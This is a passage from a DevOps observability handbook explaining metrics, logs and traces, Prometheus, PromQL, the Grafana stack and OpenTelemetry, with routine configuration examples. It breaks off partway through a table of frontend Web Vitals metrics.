The Ultimate DevOps Observability Handbook

_A comprehensive engineering reference for DevOps engineers, SREs, platform engineers, cloud architects, and backend engineers operating modern distributed systems._ --- ## Table of Contents 1. Introduction to Observability 2. The Three Pillars of Observability 3. Prometheus Architecture 4. Grafana Observability Platform 5. OpenTelemetry 6. Client Application Observability 7. Backend Observability 8. Development Observability 9. Kubernetes Observability 10. Observability Architecture for Large Infrastructure 11. Alerting and Incident Management 12. Observability Data Pipelines 13. Observability Cost Optimization 14. Incident Investigation Using Observability 15. Advanced Observability 16. Observability for Bare-Metal Infrastructure 17. The Future of Observability 18. Large Observability Glossary 19. DevOps Metrics Reference Table 20. Observability Tools Reference Table --- ## 1. Introduction to Observability ### The Limits of Traditional Monitoring For the first two decades of production systems management, "monitoring" was the primary tool for understanding system health. Monitoring operates on a simple model: define a set of metrics in advance, set threshold values, alert when those thresholds are crossed. Check if the web server process is running. Alert if CPU exceeds 90%. Page if disk fills above 95%. This model worked adequately when systems were small, when the architecture was a small number of well-understood components running on a predictable number of servers, and when failure modes were well-catalogued. When a monolithic application on a bare-metal server failed, the failure modes were limited: the process crashed, a disk filled, a network interface went down. Threshold-based monitoring could enumerate these possibilities and alert on them. Distributed systems shatter this model. A microservices architecture running on Kubernetes might involve hundreds of services, thousands of pods, millions of inter-service calls per minute, and failure modes that emerge from the interaction of components — none of which triggered a threshold in isolation. A request might succeed from the perspective of every individual service it traverses while still arriving at the user as a failure, because latency accumulated across five hops to exceed the client timeout. A service might be healthy by every monitored metric while silently returning incorrect data due to a bug in business logic. Traditional monitoring answers: "Did the thing I already knew to check break?" Observability answers: "What is actually happening, and why?" The distinction is fundamental, not incremental. ### Defining Observability Observability, in the engineering sense, is a property of a system: the degree to which its internal state can be understood from its external outputs. A system is observable if, given its outputs — metrics, logs, traces — an engineer can determine what it is doing and why, without needing to add new instrumentation each time a new question arises. This definition, adapted from control systems theory by Charity Majors and others, reframes the problem. Instead of asking "did we monitor for this failure mode?", the question becomes "does our instrumentation allow us to explore and understand arbitrary failure modes?" The first question is bounded by human imagination. The second is bounded only by the quality of the instrumentation. |Concept|Orientation|Question Answered|Failure Mode of Absence| |---|---|---|---| |Monitoring|Predefined metrics, known failure modes|"Is the thing I expect to break, broken?"|Novel failures go undetected| |Observability|Exploratory, arbitrary system state|"What is happening and why?"|Engineers can detect but not understand failures| In practice, both are required and complementary. Monitoring provides fast, reliable alerting on well-understood failure modes. Observability provides the investigative capability to understand novel failures that monitoring detects but cannot explain. ### Why Observability Is Critical in Distributed Systems The case for observability is proportional to system complexity. A single-process application has limited internal state; printf debugging is sufficient. A distributed system with 50 microservices, asynchronous event processing, multiple databases, and external API dependencies has effectively unbounded internal state. At this scale, properties emerge that cannot be understood by examining any individual component. Consider the failure modes unique to distributed systems: **Partial failures:** A single replica of a service fails while others remain healthy. Traffic is redistributed. Latency increases slightly at a percentile that no alert fires on. The failing replica is restarted by Kubernetes. The root cause — a memory leak in a specific code path triggered by a specific request pattern — is never investigated because no alert fired. **Cascading failures:** Service A is slow, which causes connection pool exhaustion in Service B, which causes Service B to time out, which causes error spikes in Service C, which has an alert that fires. The on-call engineer investigates Service C and finds nothing wrong. Without distributed tracing, the causal chain from A to B to C is invisible. **Configuration-dependent failures:** A deployment changes an environment variable. The change is backward compatible and the service starts successfully. But the new configuration causes a subtle behavioral change that only manifests under load patterns that occur once per day, during the afternoon batch processing window. Without correlation between deployment events and behavioral metrics, this connection takes days to establish. **Request fanout:** A user-facing API call triggers 12 downstream calls. Three of those calls are to the same slow database table via different code paths. Without tracing, the engineer sees elevated latency on the API endpoint but cannot identify that three independent services are all hitting the same bottleneck. Observability is the engineering infrastructure that makes these failure modes investigable. Without it, distributed systems engineering is archaeology — reconstructing what happened from fragmentary evidence after the fact, often without the ability to reproduce or fully explain it. ### Observability in Cloud-Native Infrastructure Cloud-native infrastructure — containerized workloads on Kubernetes, serverless functions, managed cloud services — introduces additional observability challenges that compound those of distributed systems generally. **Ephemeral infrastructure:** A pod exists for minutes or hours before being replaced. Traditional monitoring assumes a persistent host with a persistent process. When an investigation begins, the failing pod may no longer exist. Logs must be shipped off the pod before it terminates; metrics must be scraped at sufficient frequency to capture the relevant interval; traces must be stored centrally. **Dynamic topology:** Service discovery, autoscaling, and rolling deployments mean the set of running instances changes continuously. A monitoring system that requires static configuration of targets cannot keep up. Observability infrastructure must use dynamic service discovery. **Abstracted infrastructure:** In managed Kubernetes (EKS, GKE, AKE), the underlying nodes are largely opaque. In serverless, the entire execution environment is abstracted. Observability must work at the application and platform layer rather than relying on OS-level instrumentation. **Multi-tenancy:** Shared Kubernetes clusters run workloads from multiple teams. Observability infrastructure must support namespace-level isolation of metrics, logs, and traces, with appropriate access controls that prevent one team from querying another's data. ### Observability in Microservices Microservices architectures exist on a spectrum of coupling. At one extreme, services are independent, with well-defined contracts, separate deployment pipelines, and separate databases. At the other extreme, services share databases, have implicit contract dependencies, and are deployed as a group. Observability requirements differ along this spectrum, but some principles apply universally. **Service-level ownership:** Each service team is responsible for the observability of their service. This means defining SLIs and SLOs, instrumenting the service, writing alert rules, and maintaining runbooks. A platform team provides the infrastructure; application teams provide the instrumentation. **Trace propagation:** For distributed tracing to work across service boundaries, trace context (trace ID, span ID, sampling decision) must be propagated in every inter-service call. This requires consistent use of a propagation standard (W3C TraceContext, B3) across all services, regardless of programming language or framework. **Cross-service correlation:** An incident in one service often has its root cause in another. Observability infrastructure must allow an engineer to move from a symptom (elevated error rate on the order service) to a cause (slow response from the inventory service) by following traces, correlating metrics across service boundaries, and searching logs with a common request ID. --- ## 2. The Three Pillars of Observability ### Overview The three pillars of observability — metrics, logs, and traces — are distinct telemetry types that complement each other. Each answers different questions about system behavior. Together, they provide complete coverage of system state. |Telemetry Type|Description|Granularity|Cost|Best For| |---|---|---|---|---| |Metrics|Time-series numeric values|Aggregated|Low|Alerting, dashboards, trending| |Logs|Structured or unstructured event records|Per-event|Medium-High|Debugging, audit, error detail| |Traces|Request path across service boundaries|Per-request|Medium|Latency analysis, dependency mapping| The key insight is that these three types are not interchangeable — they are complementary, and a production observability stack requires all three. Attempting to use logs as metrics (parsing log lines to extract numbers) works at small scale but becomes operationally expensive and unreliable at production volume. Attempting to use metrics to reconstruct traces (comparing timing of metrics across services) is impossible except in the most trivial cases. ### Metrics Metrics are numeric measurements captured at regular intervals and stored as time series. Each metric has a name, a timestamp, a value, and a set of labels (also called tags or dimensions) that describe the context of the measurement. Example metric in Prometheus exposition format: ``` http_requests_total{method="POST", endpoint="/api/payments", status="200"} 15423 1709812345000 ``` This encodes: 15,423 POST requests to `/api/payments` returned status 200, as of the given Unix timestamp. **Counters** are metrics that only increase. Total requests, total errors, bytes sent. A counter that is reset indicates a process restart. The rate of change of a counter (using `rate()` in PromQL) gives the per-second rate. **Gauges** are metrics that can increase or decrease. Current active connections, current memory usage, current queue depth. The current value is meaningful; the rate of change is often also useful. **Histograms** record the distribution of values across predefined buckets. A request latency histogram with buckets at 10ms, 50ms, 100ms, 500ms, 1000ms allows calculation of percentiles (p50, p95, p99) without storing every individual request's latency. This is the correct data structure for latency SLOs. **Summaries** are similar to histograms but calculate quantiles client-side, which makes them unsuitable for aggregation across multiple instances (you cannot average percentiles). Prefer histograms. The power of metrics is in their aggregation properties. The same set of Prometheus metrics from 200 pod replicas can be aggregated with a single PromQL expression to produce a cluster-wide view, a per-namespace view, or a per-team view. This scalability is impossible with log-based approaches. ### Logs Logs are event records produced by applications and infrastructure, capturing the details of individual occurrences: a request was received, a database query executed, an error was thrown, a user authenticated. Modern logging practice distinguishes between structured and unstructured logs: **Unstructured logs** are free-text strings: ``` 2024-03-01 14:23:45 ERROR payment_service: failed to process payment for order 12345: connection timeout after 5000ms ``` These are human-readable but computationally expensive to parse and query. Pattern matching is required to extract fields, which is fragile and does not compose. **Structured logs** are machine-readable records, typically JSON: ```json { "timestamp": "2024-03-01T14:23:45.123Z", "level": "ERROR", "service": "payment_service", "event": "payment_processing_failed", "order_id": "12345", "error": "connection_timeout", "timeout_ms": 5000, "trace_id": "4bf92f3577b34da6", "span_id": "00f067aa0ba902b7" } ``` Structured logs can be queried by field, aggregated, and correlated with traces via the `trace_id` field. The `trace_id` field is the critical link between the log pillar and the traces pillar. **Log levels** carry semantic meaning that must be respected consistently across services: - `DEBUG`: Detailed diagnostic information, not emitted in production by default - `INFO`: Normal operational events (request received, job started) - `WARN`: Unexpected but handled conditions (retry succeeded after initial failure) - `ERROR`: Failures requiring attention (request failed, unable to connect to dependency) - `FATAL/CRITICAL`: Unrecoverable errors causing process termination In high-volume production systems, logging everything at DEBUG level produces log volumes that are economically and operationally unmanageable. Production log levels should be INFO by default, with the ability to dynamically increase verbosity for specific services during incident investigation. ### Traces Distributed tracing tracks the path of a single request as it traverses multiple services, recording the time spent in each component, the context passed between components, and any errors encountered. A **trace** is the complete record of a request's journey. It consists of one or more **spans**. A **span** represents a single operation within a trace — a function call, a database query, an HTTP request to a downstream service. Each span has: - A span ID (unique within the trace) - A trace ID (shared across all spans in the trace) - A parent span ID (identifying the calling operation) - Start time and duration - Status (OK, Error) - Attributes (key-value pairs describing the operation) - Events (timestamped annotations within the span) The parent-child relationship between spans forms a tree structure — the trace tree — that shows exactly which operations were called, in what order, with what timing, for a single request. ``` Trace: 4bf92f3577b34da6 (200ms total) │ ├── [0ms-200ms] api-gateway: POST /api/orders (200ms) │ ├── [2ms-15ms] auth-service: ValidateToken (13ms) │ ├── [16ms-85ms] order-service: CreateOrder (69ms) │ │ ├── [18ms-40ms] postgres: INSERT orders (22ms) │ │ └── [42ms-83ms] inventory-service: ReserveItems (41ms) │ │ └── [44ms-82ms] postgres: UPDATE inventory (38ms) │ └── [87ms-198ms] notification-service: SendConfirmation (111ms) ← SLOW │ └── [88ms-197ms] smtp-relay: SendEmail (109ms) ← ROOT CAUSE ``` This trace immediately reveals that the notification service is slow (111ms of the total 200ms) because the SMTP relay is slow (109ms). Without this trace, an engineer investigating elevated API latency would see the api-gateway's latency metric and have no path to the root cause. ### How the Three Pillars Work Together The three pillars are most powerful when used in combination, following a workflow that moves from broad signal to specific cause: 1. **Metrics → Alert:** A Prometheus alert fires because `http_error_rate` on the payment API exceeds 5% for 5 minutes. 2. **Metrics → Scope:** The engineer queries Prometheus and identifies that errors are concentrated on the `POST /v1/payments` endpoint, and that the error rate spiked at 14:23 UTC, correlated with a deployment event. 3. **Logs → Detail:** The engineer queries Loki for ERROR-level logs from the payment service in the 14:23-14:35 window and finds structured log entries showing `"event": "payment_processing_failed"` with `"error": "upstream_timeout"`. 4. **Traces → Root Cause:** The engineer queries Tempo for traces from the payment service containing the error. The trace shows the timeout occurring in the call to the fraud-scoring service, which added 6 seconds to payment processing requests after the deployment changed a default timeout value. 5. **Resolution:** Roll back the timeout configuration change. Error rate returns to baseline within 2 minutes. Without all three pillars, this investigation would have taken significantly longer at each step. Without metrics, the alert would not have fired. Without logs, the error context would not have been visible. Without traces, the fraud-scoring service would not have been identified as the root cause. --- ## 3. Prometheus Architecture ### Overview Prometheus is a time-series database and monitoring system originally developed at SoundCloud and donated to the CNCF (Cloud Native Computing Foundation) in 2016. It has become the de facto standard for metrics collection in cloud-native infrastructure. Its design reflects hard lessons from operating large-scale distributed systems. The core design principles of Prometheus: **Pull-based collection:** Prometheus scrapes metrics from targets (applications and exporters) by making HTTP requests to a `/metrics` endpoint. Targets do not push metrics to Prometheus. This inverts the common model and has important reliability properties: Prometheus controls the collection rate, targets do not need to know the address of the Prometheus server, and it is immediately visible when a target becomes unreachable (the scrape fails). **Dimensional data model:** Metrics are identified by name and a set of key-value label pairs. The same metric name with different label values represents different time series. This allows powerful aggregation: `sum(http_requests_total) by (service)` aggregates across all method, endpoint, and status combinations to give total requests per service. **Local storage:** Prometheus stores metrics locally on disk using a custom time-series database engine (TSDB). This makes it simple to operate and performant for typical query patterns, while keeping the operational complexity low. **PromQL:** A powerful functional query language purpose-built for time-series data. PromQL supports aggregation, arithmetic, vector matching, and time-based functions that make it possible to express complex reliability metrics in a single expression. ### The Prometheus Data Model Every Prometheus metric is a combination of a metric name and zero or more labels: ``` <metric_name>{<label_name>=<label_value>, ...} ``` Example: `node_cpu_seconds_total{cpu="0", mode="idle"}` Labels are the primary mechanism for filtering and aggregation. A Prometheus deployment might have 500,000 unique time series, all derived from a small number of metric names with many label combinations. **Cardinality** is the number of unique time series for a metric, determined by the number of unique label value combinations. High-cardinality labels — labels with many possible values, such as user IDs, IP addresses, or request IDs — create time series counts that grow unboundedly and cause memory and storage issues. This is one of the primary operational challenges in large Prometheus deployments. Bad practice: `http_requests_total{user_id="12345"}` — unique user IDs create millions of time series. Good practice: `http_requests_total{endpoint="/api/payments", status="200"}` — bounded label values. ### Prometheus Components **Prometheus Server:** The core component. Responsible for service discovery, scraping metrics from targets, storing time series data, evaluating alerting rules, and serving the HTTP API used by Grafana and other consumers. It is a single binary, intentionally simple to deploy. **Exporters:** Adapter processes that collect metrics from systems that do not natively expose Prometheus metrics and translate them to the Prometheus exposition format. Exporters run alongside the target system and expose a `/metrics` HTTP endpoint that Prometheus scrapes. **Alertmanager:** A separate component that receives alerts from Prometheus (and other compatible sources), deduplicates them, groups them, applies routing rules, and delivers them to notification destinations (email, Slack, PagerDuty, OpsGenie, webhooks). **Pushgateway:** A component that allows short-lived batch jobs to push metrics that would not be available for a pull-based scrape. The Pushgateway stores the last pushed value and exposes it to Prometheus. It should be used sparingly — only for genuinely ephemeral jobs — because it breaks the pull model's reliability properties. **Service Discovery:** Prometheus supports dynamic service discovery from many sources: Kubernetes (pods, services, endpoints), cloud providers (EC2, GCE, Azure), DNS SRV records, Consul, and static configuration. Dynamic discovery is essential for environments where targets appear and disappear. |Component|Role|Deployment Model|Key Consideration| |---|---|---|---| |Prometheus Server|Scraping, storage, rule evaluation|Single process, local disk|Memory proportional to active time series| |Alertmanager|Alert routing and deduplication|Clustered for HA|Shared state between instances required| |Node Exporter|OS and hardware metrics|DaemonSet (Kubernetes) / systemd|One per node| |kube-state-metrics|Kubernetes object state|Single deployment|Cluster-scoped access required| |cAdvisor|Container resource metrics|Built into kubelet|Access via kubelet metrics API| |Blackbox Exporter|External endpoint probing|Centrally deployed|Probe from multiple locations for accuracy| |Pushgateway|Ephemeral job metrics|Centrally deployed|Not suitable for persistent services| ### Core Exporters in Depth **node_exporter** The node_exporter is the standard exporter for Linux/Unix operating system and hardware metrics. It runs as a privileged process on each host and exposes hundreds of metrics covering: - CPU utilization and saturation (`node_cpu_seconds_total`, `node_load1`) - Memory usage, available, cached, buffers (`node_memory_MemFree_bytes`, `node_memory_MemAvailable_bytes`) - Disk I/O operations and bytes (`node_disk_io_time_seconds_total`, `node_disk_read_bytes_total`) - Filesystem usage (`node_filesystem_avail_bytes`, `node_filesystem_size_bytes`) - Network interface traffic and errors (`node_network_receive_bytes_total`, `node_network_transmit_errs_total`) - System processes and file descriptors (`node_procs_running`, `node_filefd_allocated`) In Kubernetes, node_exporter is deployed as a DaemonSet to ensure exactly one instance runs per node: ```yaml apiVersion: apps/v1 kind: DaemonSet metadata: name: node-exporter namespace: monitoring spec: selector: matchLabels: app: node-exporter template: spec: hostNetwork: true hostPID: true containers: - name: node-exporter image: prom/node-exporter:v1.7.0 args: - --path.sysfs=/host/sys - --path.rootfs=/host/root ports: - containerPort: 9100 volumeMounts: - name: sys mountPath: /host/sys readOnly: true - name: root mountPath: /host/root readOnly: true volumes: - name: sys hostPath: path: /sys - name: root hostPath: path: / ``` **kube-state-metrics** While node_exporter and cAdvisor focus on resource utilization, kube-state-metrics exposes the state of Kubernetes objects: deployments, pods, nodes, namespaces, services, and more. It consumes the Kubernetes API server and generates metrics reflecting the desired and actual state of cluster resources. Critical metrics from kube-state-metrics: - `kube_pod_status_phase` — is a pod running, pending, or failed? - `kube_deployment_status_replicas_available` — how many replicas are available vs desired? - `kube_node_status_condition` — is a node Ready, has it hit memory pressure or disk pressure? - `kube_pod_container_status_restarts_total` — how many times has a container restarted? - `kube_horizontalpodautoscaler_status_current_replicas` — current replica count from HPA - `kube_job_status_failed` — did a Kubernetes Job fail? - `kube_persistentvolumeclaim_status_phase` — is a PVC bound? These metrics are essential for alerting on cluster state issues that are not reflected in resource utilization metrics. **cAdvisor** cAdvisor (Container Advisor) is integrated into the kubelet and collects per-container resource metrics: - `container_cpu_usage_seconds_total` — CPU time consumed by container - `container_memory_working_set_bytes` — memory in use (the figure relevant to OOM killer) - `container_memory_rss` — resident set size - `container_network_receive_bytes_total` — bytes received on container network interface - `container_fs_reads_bytes_total` — bytes read from filesystem cAdvisor metrics have a rich label set: container name, pod name, namespace, and image. This allows precise attribution of resource consumption. **Blackbox Exporter** The blackbox exporter probes external endpoints using HTTP, HTTPS, TCP, ICMP, and DNS, and reports on their availability and response characteristics. Unlike the other exporters which instrument internal systems, blackbox exporter represents the user's perspective: is the endpoint reachable, responding correctly, and within acceptable latency? Example blackbox probe configuration: ```yaml modules: http_2xx: prober: http timeout: 5s http: valid_http_versions: ["HTTP/1.1", "HTTP/2.0"] valid_status_codes: [] # Defaults to 2xx method: GET tls_config: insecure_skip_verify: false http_post_json: prober: http http: method: POST headers: Content-Type: application/json body: '{"health": "check"}' valid_status_codes: [200, 201] ``` Prometheus scrape configuration for blackbox: ```yaml - job_name: 'blackbox_http' metrics_path: /probe params: module: [http_2xx] static_configs: - targets: - https://api.example.com/health - https://payments.example.com/v1/health relabel_configs: - source_labels: [__address__] target_label: __param_target - source_labels: [__param_target] target_label: instance - target_label: __address__ replacement: blackbox-exporter:9115 ``` ### Prometheus Storage Model Prometheus stores time-series data using the TSDB (Time Series Database), a custom storage engine optimized for append-only time-series writes and range queries. The TSDB organizes data into 2-hour blocks. Each block is an immutable directory containing: - Chunks: compressed time-series data (using Gorilla compression — typically 1.3 bytes per sample) - Index: mapping from label sets to chunk locations - Tombstones: records of deleted time series - Meta: block metadata Data is first written to an in-memory structure (the head block) and WAL (Write-Ahead Log). Every 2 hours, the head block is persisted to disk as a new block. Older blocks are periodically compacted into larger blocks to improve query performance. The compaction process also applies retention: blocks outside the retention window (default: 15 days) are deleted. Extending retention beyond 15 days in Prometheus is possible but memory and disk requirements grow proportionally. **Storage capacity estimation:** ``` Time series count × Scrape interval × Bytes per sample × Retention period = 500,000 series × (1 sample / 15s) × 1.3 bytes × (15 days × 86400s/day) = 500,000 × 5,760 samples/day × 1.3 bytes × 15 days ≈ 56 GB ``` For large deployments, Prometheus's local storage is a bottleneck. Long-term storage requires either Thanos, Cortex, or Grafana Mimir — distributed, horizontally-scalable systems that use object storage (S3, GCS) as their backend. ### PromQL Fundamentals PromQL is the query language used to select and aggregate Prometheus metrics. Understanding PromQL is essential for writing alert rules and building dashboards. **Instant vector selector:** Returns the current value of a metric: ``` http_requests_total{service="payment", status=~"5.."} ``` The `=~` operator uses regex matching. This selects all 5xx responses for the payment service. **Range vector selector:** Returns a range of values over a time window: ``` http_requests_total{service="payment"}[5m] ``` Returns all samples in the last 5 minutes. Used as input to functions like `rate()`. **rate():** Calculates the per-second rate of increase of a counter over a time window: ``` rate(http_requests_total{service="payment"}[5m]) ``` Returns the per-second request rate, averaged over the last 5 minutes. **irate():** Instant rate — based on the last two samples only. More responsive to spikes, but noisier: ``` irate(http_requests_total{service="payment"}[5m]) ``` **sum() by:** Aggregates across label dimensions: ``` sum(rate(http_requests_total[5m])) by (service) ``` Returns per-service request rate. **histogram_quantile():** Calculates percentiles from a histogram metric: ``` histogram_quantile(0.99, sum(rate(http_request_duration_seconds_bucket[5m])) by (le, service)) ``` Returns p99 latency per service. The `by (le)` preserves the histogram bucket boundaries required for quantile calculation. **Error rate calculation:** ``` sum(rate(http_requests_total{status=~"5.."}[5m])) by (service) / sum(rate(http_requests_total[5m])) by (service) ``` Returns the error rate as a fraction (0.0 - 1.0) per service. Multiply by 100 for percentage. --- ## 4. Grafana Observability Platform ### Overview Grafana is the leading open-source platform for data visualization and observability. What began as a Graphite dashboard tool has evolved into a comprehensive observability platform with support for dozens of data sources, a sophisticated alerting engine, and a full ecosystem of companion tools for log management, distributed tracing, and large-scale metrics storage. Grafana's architecture is deliberately data-source agnostic. Rather than requiring data to be stored in a proprietary format, Grafana integrates with existing storage systems via data source plugins. This means an organization can adopt Grafana incrementally — connecting it first to an existing Prometheus deployment, then adding Loki for logs, then Tempo for traces — without migrating data or replacing infrastructure. ### Grafana Core Concepts **Dashboards** are the primary unit of Grafana's visualization system. A dashboard is a collection of panels arranged in a grid, sharing a time range selector and variable system. Dashboards can be parameterized with variables (dropdown selectors for namespace, service, environment) that modify queries across all panels simultaneously. **Panels** are individual visualization units within a dashboard. Each panel queries one or more data sources and renders the result using a visualization type. Core panel types: - **Time series:** Line chart for metric data over time. The default for most observability dashboards. - **Stat:** Single large number display. Useful for current values, counts, rates. - **Gauge:** Visual gauge for utilization metrics (CPU%, memory%). - **Bar chart / Histogram:** Distribution visualization. - **Table:** Tabular display for multi-column data. - **Heatmap:** Two-dimensional density visualization. Excellent for latency distribution over time (showing the full distribution of request latencies, not just percentiles). - **Logs:** Native log display panel for Loki data sources. - **Node graph:** Directed graph visualization for service topology and dependency mapping. - **Traces:** Native trace timeline visualization for Tempo data sources. - **Canvas:** Custom diagrammatic layouts with live data binding. **Data sources** are the connections from Grafana to backing storage systems. Each data source plugin understands the query language and API of the backing system and translates Grafana's internal query model to native queries. Core data sources: Prometheus, Grafana Loki, Grafana Tempo, Grafana Mimir, Elasticsearch, CloudWatch, PostgreSQL, InfluxDB. **Alerting** in Grafana (Grafana Alerting, distinct from the legacy per-panel alerting system) provides a centralized alert management system with rule evaluation, contact points, notification policies, and silencing. Grafana Alerting supports Prometheus-compatible alert rules and can evaluate queries against any supported data source. **Variables** parameterize dashboards by allowing dynamic substitution of values in queries. A variable might be defined as a query against Prometheus to return all unique `namespace` label values, creating a dropdown that filters the entire dashboard to a specific namespace. ### The Grafana Ecosystem The Grafana ecosystem has expanded significantly with the Grafana Labs acquisition of multiple observability companies. The full stack is known as LGTM (Loki, Grafana, Tempo, Mimir): |Tool|Category|Primary Use|Storage Backend|Scale| |---|---|---|---|---| |Grafana|Visualization|Dashboards, alerting, exploration|N/A (frontend)|Single instance or HA| |Grafana Loki|Log aggregation|Log storage and querying|Object storage (S3/GCS) + index|Horizontally scalable| |Grafana Tempo|Distributed tracing|Trace storage and querying|Object storage (S3/GCS)|Horizontally scalable| |Grafana Mimir|Metrics storage|Long-term Prometheus metrics|Object storage (S3/GCS)|Horizontally scalable| |Grafana Pyroscope|Continuous profiling|CPU flame graphs, memory profiling|Object storage|Horizontally scalable| |Grafana OnCall|Incident management|On-call scheduling, escalation|PostgreSQL|HA deployment| |Grafana k6|Load testing|Performance testing|N/A|Distributed| **Grafana Loki** Loki is a log aggregation system designed for efficiency and cost-effectiveness at scale. Unlike Elasticsearch, which indexes the full text of every log entry, Loki indexes only metadata (labels) and stores log content compressed in object storage. This architectural choice reduces storage costs significantly — typically 10-50x cheaper than Elasticsearch for equivalent log volumes. Loki's query language, LogQL, borrows syntax from PromQL: Log query (return matching log lines): ``` {namespace="payments", app="payment-service"} |= "ERROR" | json | error_type != "" ``` Metric query (derive metrics from logs): ``` sum(rate({namespace="payments"} |= "payment_processing_failed" [5m])) by (service) ``` The second form — deriving metrics from logs — is a powerful capability that allows alert rules to fire based on log content. However, it should be used judiciously: log-derived metrics are more expensive to evaluate than native Prometheus metrics and have higher latency. **Grafana Tempo** Tempo is a distributed tracing backend that stores traces in object storage and indexes them by trace ID. Unlike Jaeger or Zipkin, which use Elasticsearch or Cassandra as their backing store, Tempo's object storage backend makes it significantly cheaper to operate at scale. Tempo's TraceQL query language (as of Tempo 2.0) enables attribute-based search across traces: ``` {.service.name="payment-service" && .http.status_code=500 && duration > 2s} ``` This query finds all traces where the payment service returned a 500 error and the total trace duration exceeded 2 seconds — exactly the traces relevant to a latency+error investigation. Tempo integrates with Loki and Prometheus via exemplars and derived fields: a log line with a trace ID field can be linked directly to the corresponding trace in Tempo, and a Prometheus metric exemplar can carry a trace ID that links to a representative trace. **Grafana Mimir** Mimir is a horizontally scalable, long-term storage solution for Prometheus metrics. It implements the Prometheus remote write API, meaning existing Prometheus instances can be configured to send all their data to Mimir without any application-level changes: ```yaml # prometheus.yml remote_write: - url: https://mimir.internal/api/v1/push basic_auth: username: prometheus password_file: /etc/prometheus/mimir-token ``` Mimir stores data in S3-compatible object storage, making retention periods of years economically practical. It supports multi-tenancy (each team's data is isolated), query federation across multiple Prometheus regions, and Prometheus-compatible query APIs (existing Grafana dashboards work unchanged). ### Grafana-Prometheus Integration The Prometheus data source in Grafana is configured with the URL of the Prometheus HTTP API: ```yaml # grafana.ini (or via UI) [datasources] name = Prometheus type = prometheus url = http://prometheus-server:9090 access = proxy ``` Once configured, all Prometheus metrics are available for querying in Grafana dashboards using PromQL directly in panel query editors. Grafana provides a PromQL query builder that aids in constructing queries without requiring knowledge of the full PromQL syntax, but the underlying query language is always PromQL. **Exemplars** are a critical integration feature between Prometheus and Grafana Tempo. An exemplar is a sample attached to a histogram metric that contains additional metadata — specifically, a trace ID. When a request is processed, the application can record the request's trace ID as an exemplar on its latency histogram. Grafana can then display exemplar points on a latency chart, and clicking an exemplar navigates directly to the corresponding trace in Tempo. This creates a seamless workflow from metrics (the latency spike) to traces (the specific request that was slow). --- ## 5. OpenTelemetry ### Overview and Context OpenTelemetry (OTel) is a CNCF project that provides a vendor-neutral, language-agnostic standard for telemetry instrumentation. It defines APIs, SDKs, and data protocols for collecting and exporting metrics, logs, and traces from applications. Before OpenTelemetry, every observability backend had its own instrumentation library. Instrumenting an application for Jaeger required the Jaeger client. Switching to Zipkin required replacing the Jaeger client with the Zipkin client. This vendor lock-in at the instrumentation layer made changing observability backends prohibitively expensive. OpenTelemetry solves this by separating the instrumentation API (how you record telemetry) from the export protocol (where you send it). An application instrumented with OpenTelemetry can send its telemetry to Prometheus, Grafana Tempo, Datadog, Honeycomb, New Relic, or any other compatible backend — without changing the instrumentation code. The OpenTelemetry project consolidates two earlier CNCF projects: OpenTracing (distributed tracing API) and OpenCensus (metrics and tracing instrumentation). OpenTelemetry is their successor and the strategic choice for new instrumentation. ### OpenTelemetry Architecture The OpenTelemetry architecture consists of three layers: **1. Language SDKs and APIs** OpenTelemetry provides SDKs for over 20 languages including Go, Java, Python, Node.js, .NET, Ruby, PHP, Rust, Erlang, and more. Each SDK implements the OpenTelemetry API specification. The API provides the interfaces that application code calls to record telemetry: `tracer.StartSpan()`, `meter.CreateCounter()`, `logger.Emit()`. The SDK provides the implementations of these interfaces, including sampling, resource detection, and export pipeline configuration. Crucially, the API is a no-op implementation by default. Application libraries can use the OpenTelemetry API without forcing end-users to configure or run OpenTelemetry infrastructure. The SDK registers itself with the API at application startup, activating the instrumentation. **2. Automatic Instrumentation** For many frameworks and libraries, OpenTelemetry provides automatic instrumentation that requires no code changes. Automatic instrumentation works by hooking into framework lifecycle events (HTTP request handling, database queries, message consumption) and recording spans and metrics without developer involvement. Examples: - Java agent: `java -javaagent:opentelemetry-javaagent.jar -jar application.jar` — instruments all Spring, Hibernate, JDBC, HTTP client, and messaging library calls automatically - Python: `opentelemetry-instrument python app.py` — instruments Flask, Django, SQLAlchemy, requests, and more - Node.js: `NODE_OPTIONS="--require @opentelemetry/auto-instrumentations-node/register" node server.js` Automatic instrumentation provides immediate observability coverage with zero code changes, making it particularly valuable for legacy applications or for achieving initial coverage quickly. **3. OpenTelemetry Collector** The OTel Collector is a vendor-agnostic proxy and pipeline for telemetry data. It receives telemetry from applications, processes it (filtering, sampling, enrichment, transformation), and exports it to one or more backends. The Collector architecture is a pipeline of three components: ``` Receivers → Processors → Exporters ``` **Receivers** accept incoming telemetry in various formats: - OTLP (OpenTelemetry Protocol) — the native OTel format, over gRPC or HTTP - Prometheus — scrapes Prometheus metrics endpoints - Jaeger — accepts Jaeger trace format - Zipkin — accepts Zipkin trace format - Fluentd/Fluentbit — accepts log data in Fluentd format - Kafka — consumes telemetry from Kafka topics - Host metrics — collects CPU, memory, disk, network from the host **Processors** transform telemetry in the pipeline: - `batch` — batches data to reduce export calls - `memory_limiter` — prevents the Collector from exhausting host memory - `attributes` — adds, modifies, or removes attributes from spans and metrics - `filter` — drops telemetry matching specified criteria - `resource` — adds resource attributes (service name, version, environment) - `probabilistic_sampler` — samples traces at a configurable rate - `tail_sampling` — samples traces based on the complete trace (e.g., sample all errors, sample 1% of successful traces) **Exporters** send processed telemetry to backends: - OTLP — sends to any OTLP-compatible backend (Grafana Tempo, Grafana Mimir, etc.) - Prometheus — exposes a Prometheus metrics endpoint for Prometheus to scrape - Jaeger — sends traces to Jaeger - Loki — sends logs to Grafana Loki - AWS X-Ray, Azure Monitor, GCP Cloud Trace, Datadog, New Relic, Honeycomb — cloud and commercial backends ## 6. Client Application Observability ### Frontend and Web Application Observability Frontend observability is the discipline of understanding what real users experience in their browsers and mobile devices, rather than what the backend systems report. A backend that is healthy from a server-side perspective can produce a poor user experience due to slow JavaScript execution, render-blocking resources, third-party script failures, or network conditions outside the backend's control. ### Real User Monitoring (RUM) Real User Monitoring captures performance and behavior data from actual users' browsers as they use the application. RUM data reflects the real diversity of user environments: different browsers, devices, network connections, geographic locations, and hardware capabilities. Core RUM metrics are defined by the Web Vitals initiative: |Metric|Full Name|Threshold|What It Measures| |---|---|---|---| |LCP|Largest Contentful Paint|Good: <2.5s / Poor: >4s|When the largest content element renders| |INP|Interaction to Next Paint|Good: <200ms / Poor: >500ms|Responsiveness to user interaction| |CLS|Cumulative Layout Shift|Good: <0.1 / Poor: >0.25|Visual stability during page load| |FCP|First Contentful Paint|Good: <1.8s / Poor: >3s|When first content renders| |TTFB|Time to First Byte|Good: 